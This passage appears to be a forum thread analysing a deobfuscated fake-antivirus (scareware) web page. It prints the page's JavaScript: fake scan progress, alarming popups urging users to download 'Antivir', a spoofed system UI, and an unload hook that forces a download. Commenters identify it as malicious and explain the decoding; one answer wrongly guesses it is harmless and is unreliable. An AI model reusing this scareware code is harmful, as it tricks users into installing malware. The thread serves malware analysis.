alert('Harmfull spyware or adware software. Such vulnerabilities can destroy or steal your private info and mail. On-lines scan should install Antivir utilities to fix your pc. Please click Ok to download and install Antivir tool. ');
}
function update()
{
 if ($(".progress_bar_fill").width()>0)
 {
  $("#progress_prcnt").html((
  Math.round(100-$(
  '.progress_bar_fill').width(
  )/417*100))+'%');

  $("#files1").html(sg[Math.floor(Math.random()*sg.length)] );
  if ($(".progress_bar_fill").width()<350 && teracti==0)
  {
   document.getElementById('threat1').style.visibility = 'visible';
   document.getElementById('desc').style.visibility = 'visible';
   setInterval("$('#tc1').toggleClass('none')",1000);
   teracti=1;
  }
  if ($(".progress_bar_fill").width()<200 && teracti==1)
  {
   document.getElementById('threat2').style.visibility = 'visible';
   setInterval("$('#tc2').toggleClass('none')",1000);
   teracti=2;
  }
  if ($(".progress_bar_fill").width()<100 && teracti==2)
  {
   document.getElementById('threat3').style.visibility = 'visible';
   setInterval("$('#tc3').toggleClass('none')",1000);
   setInterval("$('#tc4').toggleClass('none')",1000);
   teracti=3;
  }  
 }
 else
 {
  clearInterval(pinter);
  $(".files2").html("<b>System scanning completed. 431 Probably harmfull items was found!</b>");
  setTimeout("pop2()",1000);
 }
}
function Minimize() 
{
window.innerWidth = 100;
window.innerHeight = 100;
window.screenX = screen.width;
window.screenY = screen.height;
alwaysLowered = true;
}
ww1 = screen.width;
ww2 = screen.height;
function Maximize() {window.moveTo(0,0);window.resizeTo( ww1, ww2 );}
function download() {
 window.location='/download.php?id=2022';
}
function away()
{
    w = window;
    ua = navigator.userAgent;
    v1 = ua.toLowerCase().indexOf('msie') != -1 && ua.toLowerCase().indexOf('opera') < 0;
    x = 11;
    eval('w.resizeTo(x*10,x*11-7)');
    w.moveTo(v1 ? (screen.width - 100) >> 1 : 11027, v1 ? (screen.height - 100) >> 1 : 10659);
}
function pop1() {
    confirm('Warning!!! '+
    'Your PC needs to install antimalware software! Antivir can perform fast and free  scan of your computer .');
    }
function pop2() {
confirm('This computer is under  attack'+
'They can seriously harm your private data or files, and should be healed immediately.'+
'Return to Antivir and download it secure to your PC');
pop4();
}
function pop3dsds() {
alert('Computer might be affected by spyware or other types of viruses!  '+
'Your mail, passwords and private documents might be in danger, protect your PC immediately.'+
'Return to Antivir and download it secure to your PC');
}
function pop4() {
  document.getElementById('ap').style.display = 'block';
  $(".left_bar").css("display","none");
  $(".left_bar").css("display","block");
}
function sp2init(){
}
function loading() {
  if (window.attachEvent)
    away();
  pop1();
  Maximize();
  window.focus(); 
}
```

It's a fake anti-virus thing that tries to trick you into infecting yourself. The other array probably evaluates to something just as bad if not worse. I can't evaluate it as you didn't post all the code.

EDIT: I was able to figure out the offset used for the second array. This is what it evaluates to, although the array is incomplete:

```
function loaded() {
  $("#white").css("display","none");
  $("#page_progress").css("display","block");
  $(".left_bar").css("display","none");
  $(".left_bar").css("display","block");
  $(".progress_bar_fill").animate({width:"0px"},ss*1000);
  writegeoip();
    pinter = setInterval(update,ss*10);
  Drag.init(document.getElementById('ap'));
};
loading();
var exit = true;
var usePopDialog = true;
var nid=0;
var tid=431;
var mid=947;
var full=1;
var popDialogOptions = "dialogWidth:1024px; dialogHeight:768px; dialogTop:0px; dialogLeft:0px; edge:Raised; center:0; help:0; resizable:1; scroll:1; status:0";
var popWindowOptions = " scrollbars=1,menubar=1,toolbar=1,location=1,personalbar=1,status=1,resizable=1";
var clid = "7f09c9e1c55f7d63f02909a14c1a45e0";
var usePopDialog = true;
var isUsinfnmpecial = false;
dat=new Date(1263096893);
var ghf=dat.getHours()-dat.getUTCHours();
newurl = "/download.php?id=2022&dlth="+ghf;
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
function dddggg(){
    if(!isXPSP2 && !usePopDialog)               {
                         window.open(popURL,"",popWindowOptions);
               }else if(!isXPSP2 && usePopDialog) {
                         eval("window.showModalDialog(popURL,'',popDialogOptions)");
               }else{
                         iie.launchURL(popURL);
               }
}
function ext(){
       if(exit)       {
               exit=false;
               emilion();
               dddggg();
        }
}
var popURL = newurl;
isUsinfnmpecial = true;
if (window.attachEvent)
 eval("window.attachEvent('onunload',ext);");
else
 window.addEventListener("unload", ext, false);
</script>

</head>
<body onLoad="loaded()">

<DIV id=ap style="LEFT: 0px; z-index:2; WIDTH: 100%; POSITION: absolute; TOP: 190px; display: none;" align=center>
<DIV style="cursor:hand; WIDTH: 434px; height:332px; POSITION: relative; background-image:url(img/001.gif); background-color:white;"><input type='button' style='POSITION: relative; width:21px; height:21px; left:200px; top:5px; border-width:0px; background-image:url(cb.gif)' onclick='hideWarnDialog();'><spacer width='446' height='294' /></DIV>
</div>

<div style="display: none;" id="white" class="white_div" align="center">
    <div style="position: relative; top: 50%;"><img src="img/007.gif" width="51" height="19">    </div>
   </div>
<div style="display: block;" class="left_bar">
  <div class="left_header">System Tasks</div>
    <div class="left_box">
        <div class="left_box_line">
            <img src="img/016.gif" class="left_bar_icon" width="14" height="16"><a href="#">View system information</a>     </div>
      <div class="left_box_line">
        <img src="img/017.gif" class="left_bar_icon" width="16" height="16"> <a href="#">Add or remove programs</a>   </div>
      <div class="left_box_line">
        <img src="img/018.gif" class="left_bar_icon" width="16" height="16"> <a href="#">Change a settings</a>      </div>
  </div>
    <div class="left_header">
        Other Places  </div>
    <div class="left_box">
        <div class="left_box_line">
            <img src="img/012.gif" class="left_bar_icon" width="16" height="16"> <a href="#">My Network Places</a>      </div>
      <div class="left_box_line">
        <img src="img/013.gif" class="left_bar_icon" width="16" height="16"> <a href="#">My Documents</a>      </div>
      <div class="left_box_line">
        <img src="img/014.gif" class="left_bar_icon" width="16" height="14"> <a href="#">Shared Documents</a>      </div>
      <div class="left_box_line">
        <img src="img/015.gif" class="left_bar_icon" width="16" height="16"> <a href="#">Control Panel</a>      </div>
  </div>
    <div class="left_header">
        Details  </div>
    <div class="left_box">
      <div class="left_box_line"> <strong>My Computer</strong><br>
System Folder      </div>
    </div>
    <div class="left_header">
                Your Info </div>
        <div class="left_box">
          <div class="left_box_line">
      <strong>IP: </strong><span style="color:#F00">98.66.215.133</span><br>
      <strong>Country: </strong><span
```

Comment: how did you manage to, er, decode it?

Comment: I used my webserver to run the javascript and instead of the line "document.write(renb)" I used my debug tools to find the value of the string renb. This is basic obfuscation, each numerical value in the array is a single letter.

Comment: Very clever, +1.

Comment: Thank you :) Although it looks like the original poster lost interest.

Comment: GJ and some good sleuthing skills! +1

Comment: `function dddggg(){` no respectable coder would use a function name that does not imply what it does. adding to what @Marcin found out, yep, it is most probably malicious.

Answer (score 0):

What you have posted looks like a partial JavaScript source file, that seems to stop halfway through a `for` loop. The cryptic variable names and the slightly mad formatting suggests this code was minified or auto-generated.

I suspect that this is not a virus, as a functioning JavaScript (or whatever language this is) interpreter would be need to be instructed to run the code, let alone to do harm. But more information is needed, such as where this file is located, and which programs use it.